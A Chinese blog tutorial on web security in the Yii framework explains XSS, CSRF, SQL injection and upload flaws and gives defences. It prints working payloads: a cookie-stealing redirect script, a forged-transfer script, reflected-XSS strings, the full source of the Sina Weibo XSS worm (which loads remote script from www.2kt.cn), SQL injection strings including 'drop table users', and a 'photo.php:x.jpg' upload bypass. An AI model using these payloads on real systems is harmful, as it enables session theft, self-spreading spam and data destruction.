<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.2" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/bunao.ico?v=6.4.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/bunao.ico?v=6.4.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/bunao.ico?v=6.4.2">


  <link rel="mask-icon" href="/images/bunao.ico?v=6.4.2" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.4.2',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="xss攻击 想方设法把js注入到页面中，可以通过url(反射性)或者 提交数据(提交的数据会保存在后台，显示在页面)跨站脚本攻击(Cross Site Scripting)将js代码插入到给用户使用的页面中，从而对用户进行攻击    盗取用户账号(使用cookie登陆)将下面代码出入页面，当用户访问这个页面的时候将会把cookie发送给自己，在cookie中寻找自己需要的登陆cookie1234&amp;">
<meta name="keywords" content="yii安全,安全,xss,csrf,sql注入,文件上传漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="Yii-安全篇">
<meta property="og:url" content="http://bunao.win/2017/07/02/yii/Yii-安全篇/index.html">
<meta property="og:site_name" content="不孬">
<meta property="og:description" content="xss攻击 想方设法把js注入到页面中，可以通过url(反射性)或者 提交数据(提交的数据会保存在后台，显示在页面)跨站脚本攻击(Cross Site Scripting)将js代码插入到给用户使用的页面中，从而对用户进行攻击    盗取用户账号(使用cookie登陆)将下面代码出入页面，当用户访问这个页面的时候将会把cookie发送给自己，在cookie中寻找自己需要的登陆cookie1234&amp;">
<meta property="og:updated_time" content="2017-07-12T23:16:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Yii-安全篇">
<meta name="twitter:description" content="xss攻击 想方设法把js注入到页面中，可以通过url(反射性)或者 提交数据(提交的数据会保存在后台，显示在页面)跨站脚本攻击(Cross Site Scripting)将js代码插入到给用户使用的页面中，从而对用户进行攻击    盗取用户账号(使用cookie登陆)将下面代码出入页面，当用户访问这个页面的时候将会把cookie发送给自己，在cookie中寻找自己需要的登陆cookie1234&amp;">






  <link rel="canonical" href="http://bunao.win/2017/07/02/yii/Yii-安全篇/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Yii-安全篇 | 不孬</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?4719716f509495788172dc0058a6f11e";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">不孬</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <h1 class="site-subtitle" itemprop="description">echo-ding</h1>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://bunao.win/2017/07/02/yii/Yii-安全篇/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="echo-ding">
      <meta itemprop="description" content="less is more">
      <meta itemprop="image" content="/images/my.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="不孬">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">Yii-安全篇
              
            
          </h2>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2017-07-02 11:56:02" itemprop="dateCreated datePublished" datetime="2017-07-02T11:56:02+08:00">2017-07-02</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2017-07-13 07:16:07" itemprop="dateModified" datetime="2017-07-13T07:16:07+08:00">2017-07-13</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/安全/" itemprop="url" rel="index"><span itemprop="name">安全</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/07/02/yii/Yii-安全篇/" class="leancloud_visitors" data-flag-title="Yii-安全篇">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数：</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="xss攻击"><a href="#xss攻击" class="headerlink" title="xss攻击"></a>xss攻击</h2><blockquote>
<p>想方设法把js注入到页面中，可以通过url(反射性)或者 提交数据(提交的数据会保存在后台，显示在页面)<br><strong>跨站脚本攻击(Cross Site Scripting)</strong><br>将js代码插入到给用户使用的页面中，从而对用户进行攻击  </p>
</blockquote>
<p><strong>盗取用户账号(使用cookie登陆)</strong><br>将下面代码出入页面，当用户访问这个页面的时候将会把cookie发送给自己，在cookie中寻找自己需要的登陆cookie<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;</div><div class="line"><span class="keyword">var</span> cookie = <span class="built_in">document</span>.cookie;</div><div class="line"><span class="built_in">window</span>.location.href = <span class="string">'http://127.0.0.1/index.php?cookie = '</span>+cookie</div><div class="line">&lt;<span class="regexp">/script&gt;</span></div></pre></td></tr></table></figure></p>
<p>将cookie设置成httponly，js将无法读取这条cookie  </p>
<p><strong>非法转账</strong>  </p>
<p>自动转账的代码逻辑，自动填写并确认跳转<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">document</span>.getElementById(<span class="string">'ipt-search-key'</span>).value = <span class="string">'ding@163.com'</span>;<span class="comment">//自动填写转账的账户</span></div><div class="line"><span class="built_in">document</span>.getElementById(<span class="string">'amount'</span>).value = <span class="string">'100'</span>;<span class="comment">//自动填写转账的金额</span></div><div class="line"><span class="built_in">document</span>.getElementById(<span class="string">'reason'</span>).value = <span class="string">'劫富济贫'</span>;<span class="comment">//自动填写原因</span></div><div class="line"><span class="built_in">document</span>.getElementsByClassName(<span class="string">'ui-button-text'</span>)[<span class="number">0</span>].click();<span class="comment">//自动跳转</span></div></pre></td></tr></table></figure></p>
<p>将javascript注入到其他页面，但是需要注入到用户使用的转账的页面，这个是比较难的，需要使用反射性xxs</p>
<h3 id="反射性xss"><a href="#反射性xss" class="headerlink" title="反射性xss"></a>反射性xss</h3><blockquote>
<p>原理：将js代码赋值给url需要get传参的key，后台获取到这个key又会原原本本的将这个key输出到前端页面<br>选好需要攻击的网站页面，url需要有get传参的内容，确定后台获取到get传参的key值会将其原原本本的输出到前端页面，这样就可以进行攻击了  </p>
</blockquote>
<p>将js代码赋值给url的get需要传参的key，例如<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">//url</div><div class="line">www.basic.com/index.php?r=article/post&amp;name=abc&lt;script&gt;alert(&apos;hello world&apos;)&lt;/script&gt;</div><div class="line">//but，浏览器会智能过滤掉js标签  </div><div class="line">//可以通过后端设置响应头让其不过滤</div><div class="line">\YII:$app-&gt;response-&gt;headers-&gt;add(&apos;x-xss-Protection&apos;, &apos;0&apos;);</div><div class="line">//后端的逻辑是直接将获取到的name直接到页面</div><div class="line">echo \YII:$app-&gt;request-&gt;get(&apos;name&apos;);</div></pre></td></tr></table></figure></p>
<p>输出的内容可能被编码转换成字符串,导致无法执行<br>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&quot;abc%3Cscript%3Ealert(&apos;hello world&apos;)%3C/script%3E&quot;</div><div class="line">//%3Cscript%3E即&lt;script&gt;</div></pre></td></tr></table></figure></p>
<p>假设，后台获取到这个name值后将其放进了js中(可以通过实验，查看源码，看后台将获取到的数据放到哪里了)<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;</div><div class="line">...</div><div class="line">&#123;</div><div class="line">    ...</div><div class="line">    pageAbsUrl:<span class="string">"...name=abc%3Cscript%3Ealert('hello world')%3C/script%3E"</span></div><div class="line">    ...</div><div class="line">&#125;</div><div class="line">...</div><div class="line">&lt;<span class="regexp">/script&gt;</span></div></pre></td></tr></table></figure></p>
<p>因为，已经有了<code>&lt;script&gt;</code>标签，所以传入的不需要 <code>&lt;script&gt;</code> 标签了，根据放入的位置拼装执行代码<br>最后可执行的代码的样子<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;</div><div class="line">...</div><div class="line">&#123;</div><div class="line">    ...</div><div class="line">    pageAbsUrl:<span class="string">"...name=abc"</span>,alert(<span class="string">'hello world'</span>)<span class="comment">//"</span></div><div class="line">    ...</div><div class="line">&#125;</div><div class="line">...</div><div class="line">&lt;<span class="regexp">/script&gt;</span></div></pre></td></tr></table></figure></p>
<p>所以需要将url改成<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">www.basic.com/index.php?r=article/post&amp;name=abc&quot;,alert(&apos;hello world&apos;)//</div></pre></td></tr></table></figure></p>
<p>又一个问题，经过自动编译处理将会把 <code>&quot;</code> 变成 <code>%22</code> 导致无法执行<br>这就需要使用 HTML实体编码<br><strong>HTML实体编码</strong><br>查看HTML实体编码表<br><code>&quot;</code>可以使用 <code>&amp;quot;</code> 代替<br>但是url会根据 <code>&amp;</code> 进行参数分割<br>可以使用url编码将 <code>&amp;</code> 编码 <code>%26</code><br><strong>url编码</strong><br>通过查看URL编码表<br>js的 <code>escape()</code>方法</p>
<p>最后，因为获取内容放在 <code>&lt;script&gt;</code> 中，在js环境中是不认识HTML实体编码的，所以还是无法执行<br>但是，如果没有在 <code>&lt;script&gt;</code> 的是可行的</p>
<h3 id="xxs蠕虫攻击"><a href="#xxs蠕虫攻击" class="headerlink" title="xxs蠕虫攻击"></a>xxs蠕虫攻击</h3><p>xxs worm<br>页面中插入js代码，发布，当用户访问的时候，又会以访问用户的身份发布文章，感染性极强</p>
<p>示例<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http:<span class="comment">//weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</span></div></pre></td></tr></table></figure></p>
<p>使用js的 <code>uneacape()</code> 将转义一下可以看到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&quot;http://weibo.com/pub/star/g/xyyyd&quot;&gt;&lt;script src=//www.2kt.cn/images/t.js&gt;&lt;/script&gt;?type=update&quot;</div></pre></td></tr></table></figure></p>
<p>当用户访问这个页面的时候将会去加载 <code>t.js</code>,在t.js中实现逻辑<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">createXHR</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	<span class="keyword">return</span> <span class="built_in">window</span>.XMLHttpRequest?</div><div class="line">	<span class="keyword">new</span> XMLHttpRequest():</div><div class="line">	<span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">getappkey</span>(<span class="params">url</span>)</span>&#123;</div><div class="line">	xmlHttp = createXHR();</div><div class="line">	xmlHttp.open(<span class="string">"GET"</span>,url,<span class="literal">false</span>);</div><div class="line">	xmlHttp.send();</div><div class="line">	result = xmlHttp.responseText;</div><div class="line">	id_arr = <span class="string">''</span>;</div><div class="line">	id = result.match(<span class="regexp">/namecard=\"true\" title=\"[^\"]*/g</span>);</div><div class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;id.length;i++)&#123;</div><div class="line">		sum = id[i].toString().split(<span class="string">'"'</span>)[<span class="number">3</span>];</div><div class="line">		id_arr += sum + <span class="string">'||'</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">return</span> id_arr;</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">random_msg</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	link = <span class="string">' http://163.fm/PxZHoxn?id='</span> + <span class="keyword">new</span> <span class="built_in">Date</span>().getTime();;</div><div class="line">	<span class="keyword">var</span> msgs = [</div><div class="line">		<span class="string">'郭美美事件的一些未注意到的细节：'</span>,</div><div class="line">		<span class="string">'建党大业中穿帮的地方：'</span>,</div><div class="line">		<span class="string">'让女人心动的100句诗歌：'</span>,</div><div class="line">		<span class="string">'3D肉团团高清普通话版种子：'</span>,</div><div class="line">		<span class="string">'这是传说中的神仙眷侣啊：'</span>,</div><div class="line">		<span class="string">'惊爆!范冰冰艳照真流出了：'</span>,</div><div class="line">		<span class="string">'杨幂被爆多次被潜规则:'</span>,</div><div class="line">		<span class="string">'傻仔拿锤子去抢银行：'</span>,</div><div class="line">		<span class="string">'可以监听别人手机的软件：'</span>,</div><div class="line">		<span class="string">'个税起征点有望提到4000：'</span>];</div><div class="line">	<span class="keyword">var</span> msg = msgs[<span class="built_in">Math</span>.floor(<span class="built_in">Math</span>.random()*msgs.length)] + link;</div><div class="line">	msg = <span class="built_in">encodeURIComponent</span>(msg);</div><div class="line">	<span class="keyword">return</span> msg;</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">post</span>(<span class="params">url,data,sync</span>)</span>&#123;</div><div class="line">	xmlHttp = createXHR();</div><div class="line">    xmlHttp.open(<span class="string">"POST"</span>,url,sync);</div><div class="line">    xmlHttp.setRequestHeader(<span class="string">"Accept"</span>,<span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);</div><div class="line">    xmlHttp.setRequestHeader(<span class="string">"Content-Type"</span>,<span class="string">"application/x-www-form-urlencoded; charset=UTF-8"</span>);</div><div class="line">    xmlHttp.send(data);</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">publish</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	url = <span class="string">'http://weibo.com/mblog/publish.php?rnd='</span> + <span class="keyword">new</span> <span class="built_in">Date</span>().getTime();</div><div class="line">	data = <span class="string">'content='</span> + random_msg() + <span class="string">'&amp;pic=&amp;styleid=2&amp;retcode='</span>;</div><div class="line">	post(url,data,<span class="literal">true</span>);</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">follow</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	url = <span class="string">'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&amp;atnId=profile&amp;rnd='</span> + <span class="keyword">new</span> <span class="built_in">Date</span>().getTime();</div><div class="line">	data = <span class="string">'uid='</span> + <span class="number">2201270010</span> + <span class="string">'&amp;fromuid='</span> + $CONFIG.$uid + <span class="string">'&amp;refer_sort=profile&amp;atnId=profile'</span>;</div><div class="line">	post(url,data,<span class="literal">true</span>);</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">message</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	url = <span class="string">'http://weibo.com/'</span> + $CONFIG.$uid + <span class="string">'/follow'</span>;</div><div class="line">	ids = getappkey(url);</div><div class="line">	id = ids.split(<span class="string">'||'</span>);</div><div class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;id.length - <span class="number">1</span> &amp; i&lt;<span class="number">5</span>;i++)&#123;</div><div class="line">		msgurl = <span class="string">'http://weibo.com/message/addmsg.php?rnd='</span> + <span class="keyword">new</span> <span class="built_in">Date</span>().getTime();</div><div class="line">		msg = random_msg();</div><div class="line">		msg = <span class="built_in">encodeURIComponent</span>(msg);</div><div class="line">		user = <span class="built_in">encodeURIComponent</span>(<span class="built_in">encodeURIComponent</span>(id[i]));</div><div class="line">		data = <span class="string">'content='</span> + msg + <span class="string">'&amp;name='</span> + user + <span class="string">'&amp;retcode='</span>;</div><div class="line">		post(msgurl,data,<span class="literal">false</span>);</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">main</span>(<span class="params"></span>)</span>&#123;</div><div class="line">	<span class="keyword">try</span>&#123;</div><div class="line">		publish();</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">catch</span>(e)&#123;&#125;</div><div class="line">	<span class="keyword">try</span>&#123;</div><div class="line">		follow();</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">catch</span>(e)&#123;&#125;</div><div class="line">	<span class="keyword">try</span>&#123;</div><div class="line">		message();</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">catch</span>(e)&#123;&#125;</div><div class="line">&#125;</div><div class="line"><span class="keyword">try</span>&#123;</div><div class="line">   x=<span class="string">"g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)"</span>;<span class="built_in">window</span>.opener.eval(x);</div><div class="line">&#125;</div><div class="line"><span class="keyword">catch</span>(e)&#123;&#125;</div><div class="line">main();</div><div class="line"><span class="keyword">var</span> t=setTimeout(<span class="string">'location="http://weibo.com/pub/topic";'</span>,<span class="number">5000</span>);</div></pre></td></tr></table></figure></p>
<p><strong>预防</strong><br>1.使用 <code>\yii\helpers\Html::encode(&#39;内容&#39;);</code> 进行html实体编码转义<br>2.将过滤掉js的代码 <code>\yii\helpers\HtmlPurifier::process(&#39;内容&#39;);</code> 浏览器认为哪段是js代码，yii就根据浏览器相同的算法识别出js代码</p>
<h2 id="CSRF攻击"><a href="#CSRF攻击" class="headerlink" title="CSRF攻击"></a>CSRF攻击</h2><blockquote>
<p>原理：。将组装好的url发布到公共可以浏览的地方，当浏览点击这个链接的时候会实现攻击了(<strong>如果可以跨过登陆的话，用户可能登陆过并多少天内记录了自动登陆功能，或者刚访问过了那个要攻击网站，这样就跨过登陆了</strong>)，也可以通过表单  </p>
</blockquote>
<p>跨站请求伪造攻击，和xss很相似<br>将执行的url放在页面里，用户点击将会执行，比如说删除的连接，转账的链接，就是简单的一个链接请求可以直接执行，而不需要js来去辅助执行</p>
<p><strong>get类型的CSRF攻击</strong><br>例如，某网上银行的漏洞<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">http://www.xxxbank.com/index.php?from=zhangsan&amp;to=lisi&amp;money=400</div><div class="line">//zhangsan转给lisi400块</div></pre></td></tr></table></figure></p>
<p><strong>post类型的CSRF攻击</strong><br>需要用户先登录，仿照需要攻击的网站的表单，设法让用户访问自己的仿照的表单发送给攻击的网站而达成目的</p>
<h3 id="CSRF防御"><a href="#CSRF防御" class="headerlink" title="CSRF防御"></a>CSRF防御</h3><p>1.判断 <code>Referer</code> 头,但是有时候请求不会携带这个请求头<br>2.防伪措施，请求表单的时候，将防伪标识插入到表单，表单提交的时候进行比对</p>
<p>yii默认是开启防止CSRF攻击的 表单中加入 <code>name = _csrf</code> 的隐藏input标签<br>同时将 <code>_csrf</code> 存入到cookie中，请求的时候两个都会进行携带，进行比对，cookie中的是加过密的，后台获取后进行解密，并和表单进行比对<br>控制器获取 <code>_csrf</code> 的值<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">\YII::$app-&gt;requrst-&gt;csrfToken;</div></pre></td></tr></table></figure></p>
<h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><p>示例<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">//根据用户账号密码查询漏洞</div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> <span class="keyword">name</span> = <span class="string">'zhangsan'</span> <span class="keyword">and</span> <span class="keyword">password</span> = <span class="string">'xxxxx'</span></div><div class="line">//<span class="number">1.</span>将用户名设置为</div><div class="line">zhangsan<span class="string">' --    即可破解 // --在mysql表示注释</span></div><div class="line">select * from users where name = 'zhangsan<span class="string">' --'</span> <span class="keyword">and</span> <span class="keyword">password</span> = <span class="string">'xxxxx'</span></div><div class="line"></div><div class="line">//<span class="number">2.</span>将用户名设置为</div><div class="line"><span class="string">'; drop table users; --  将会删除users表</span></div><div class="line">select * from users where name = ''; drop table users; --' <span class="keyword">and</span> <span class="keyword">password</span> = <span class="string">'xxxxx'</span></div><div class="line"></div><div class="line">//根据关键字查询并有限制的语句</div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> articles <span class="keyword">where</span> score&lt;<span class="number">60</span> <span class="keyword">and</span> title <span class="keyword">like</span> <span class="string">'%关键词%'</span></div><div class="line">//<span class="number">1.</span>查询出所有结果</div><div class="line">将关键词设置为</div><div class="line"><span class="string">' or 1=1 --     即可破解 or也可以使用 || 代替</span></div></pre></td></tr></table></figure></p>
<p>还有就是使用编码导致的(GBK),php将 <code>&#39;</code> 单引号转义后 <code>\&#39;</code> 如果遇到特殊的字符一起，并不能很好会将前面的字符和 <code>\</code> 组成一个字符，而将 <code>&#39;</code> 暴漏出来，导致入侵</p>
<p><strong>sql防范</strong><br>数据库配置有一个选项，可以配置转义工作发生在php端还是mysql端，在mysql端转义更安全<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">'emulatePrepare'=&gt;false,</div></pre></td></tr></table></figure></p>
<p>可以通过 <strong><em>wireshark</em></strong> 软件抓包查看发送给mysql的数据  </p>
<h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>Fiddler工具可以抓取浏览器的请求，并进行阻断<br><strong><em>Rules—&gt;Automatic Breakpoints—&gt;Before Requests</em></strong> 添加断点，在请求发出去前进行阻断，<br><!-- ![](http://img.mukewang.com/58ca8586000104cb12800720.jpg) --><br>修改后可以<strong><em>Run to Completion</em></strong>继续进行请求</p>
<p>可以修改文件的type</p>
<p>通过系统的漏洞来利用上传漏洞<br>系统在命名文件的时候是不允许使用特殊符号的例如 <code>:</code> ,通过修改器截获的请求，将文件名改成 <code>photo.php:x.jpg</code> ,如果在后端是使用上传的原文件名 <code>name</code> 进行保存的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">move_uploaded_file($_FILES[&apos;photo&apos;][&apos;tmp_name&apos;], &apos;./&apos;.$_FILES[&apos;photo&apos;][&apos;name&apos;]);</div></pre></td></tr></table></figure></p>
<p>在保存 <code>photo.php:x.jpg</code> 的时候将会保存成  <code>photo.php</code>  </p>
<p>所以尽量不要使用用户给的文件名</p>

      
    </div>

    

    
    
    

    
      <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
